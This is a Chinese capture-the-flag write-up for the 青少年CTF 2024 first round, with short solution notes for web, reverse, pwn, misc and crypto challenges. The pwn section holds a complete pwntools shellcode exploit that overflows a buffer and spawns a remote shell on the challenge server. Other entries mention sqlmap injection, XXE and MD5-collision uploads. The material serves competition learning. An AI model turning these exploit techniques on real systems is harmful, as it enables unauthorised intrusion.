青少年ctf2024#Round_1

菜的雅痞

WEB

easymd5

fastcoll md5碰撞 生成两个md5后一样的文件,改为pdf上传

PHP的后门

看 and 搜 一下PHP版本,全是

PHP的XXE

dom.php中利用xxe

Easy_SQLi

POST的sql注入

保存数据包为1.txt

sqlmap梭

雏形系统

dirsearch扫一下,发现www.zip

解混淆,base url 编码解一下,eval改为echo输出原内容

反序列化

传参

image-20240304181806873

RE

来打CS咯

https://s.threatbook.com/report/file/1f795a15191a4e19d32f4be3011beb6e718f2e62fe01dffebdd715424abd2f13

云沙箱运行一下得到IP

pwn

简单的数学题

三道计算题

https://zs.symbolab.com/solver

前两道随便找个在线网站一键计算,最后的数有点大,使用sagemath进行计算即可

1
2
3
4
5
6
7
from sage.all import *
x = SR.var('x')

f = x**10 + 2**10 - 4*x - 6131066258749

sol = find_root(f, 0, 100000)  
print(sol)

Easy_Shellcode

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
from pwn import *
from LibcSearcher import *
from ctypes import *
context(os='Linux',arch = 'amd64',log_level ='debug')

# p = process('./pwn')
# p = gdb.debug('./pwn')
p = remote('challenge.qsnctf.com',31862)
elf = ELF('./pwn')

# libc = cdll.LoadLibrary('libc.so.6') 
# libc.srand(1) #设置种子

sa = lambda s,n : p.sendafter(s,n)
sla = lambda s,n : p.sendlineafter(s,n)
sl = lambda s : p.sendline(s)
sd = lambda s : p.send(s)
rc = lambda n : p.recv(n)
rcv = lambda : p.recv()
ru = lambda s : p.recvuntil(s)
it = lambda : p.interactive()
d = lambda :gdb.attach(p)
b = lambda :pause()

buf = int(rc(16)[2:-1],16)
print(buf)
shellcode = asm(shellcraft.sh())

payload = shellcode.ljust(0x108,b'a') + p64(buf)

# d()
# b()
sl(payload)


it()

MISC

CTFer Revenge

发现RAR文件的文件头,猜测是逆置的,编写代码反转回去

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
import re

# 读取文本文件
with open('11.txt', 'r') as file:
    lines = file.read()

# 使用splitlines()方法将文本分割成行列表
lines_list = lines.splitlines()

def remove_between_pipes(line):
    return re.sub(r'(\|.+\|)', '', line)

new_lines_list = []
for line in lines_list:
    new_line = line[:-8]
    new_line = remove_between_pipes(new_line)
    new_lines_list.append(' '.join(new_line.split('\n')))



# 将结果写入新的文本文件
with open('114.txt', 'w') as new_file:
    for new_line in new_lines_list:
        new_file.write(new_line.replace(" ", ""))

with open('114.txt', 'r') as file:
    lines = file.read()
    new_lines_list = lines[::-1]
with open('114.txt', 'w') as new_file:
    for new_line in new_lines_list:
        new_file.write(new_line.replace(" ", ""))

010导入16进制文件即可,保存成RAR

最后用ARCHPR通过提示爆破密码

ez_model

网上搜索脚本,直接查看模型数据

1
2
3
4
5
6
7
8
9
10
11
12
13
14
import torch

pthfile = r'./easy.pth'  # .pth文件的路径
model = torch.load(pthfile, torch.device('cpu'))  # 设置在cpu环境下查询
print('type:')
print(type(model))  # 查看模型字典长度
print('length:')
print(len(model))
print('key:')
for k in model.keys():  # 查看模型字典里面的key
    print(k)
print('value:')
for k in model:  # 查看模型字典里面的value
    print(k, model[k])

通过两次解码,猜测是变表的base64

追光者

bandizip修复一下压缩包

发现

binwalk分离追光者.jpg发现一个压缩包

注释算是提示吧 :(=

从追光者.jpg中发现密码(别抽象了哥,求你了)

txt中部分flag

解压发现可以利用明文攻击,拿到另一部分flag文件,逆序一下

多情

分离出一张图片,看文字提示修改宽高发现996

转二进制排序文本中的内容

小光的答案之书

圣堂武士密码,life

关注公众号,拿flag

问卷

qsnctf{青少年CTF蒸蒸日上}

没抽到奖,难受

CRYPTO

解个方程

ez_log

https://blog.csdn.net/Luiino/article/details/126117985

https://ctf-wiki.org/crypto/asymmetric/discrete-log/discrete-log/

离散对数

利用sympy库中的discrete_log(x,y,z)函数可求解,x:模数,y:余数,z:底数

1
2
3
4
5
6
7
8
9
10
from Crypto.Util.number import *
import sympy
import binascii

m = 3
c = 2755382540415579102071064701464875587397358450731640269892589311709262533380944401636001606033435395119029405853044523473152024882723244640973125106544997919867124733729051371170794687714291
n = 3006156660704242356836102321001016782090189571028526298055526061772989406357037170723984497344618257575827271367883545096587962708266010793826346841303043716776726799898939374985320242033037

flag = sympy.discrete_log(n, c, m)
print(long_to_bytes(flag))

ezrsa

拿到d和r

用r做n,直接解rsa

四重加密

压缩包注释 base64 拿到密码 qsnctf

html转换

维吉尼亚然后rot13

flag{ldvgosdabv_kfkjc_jcvsbdi}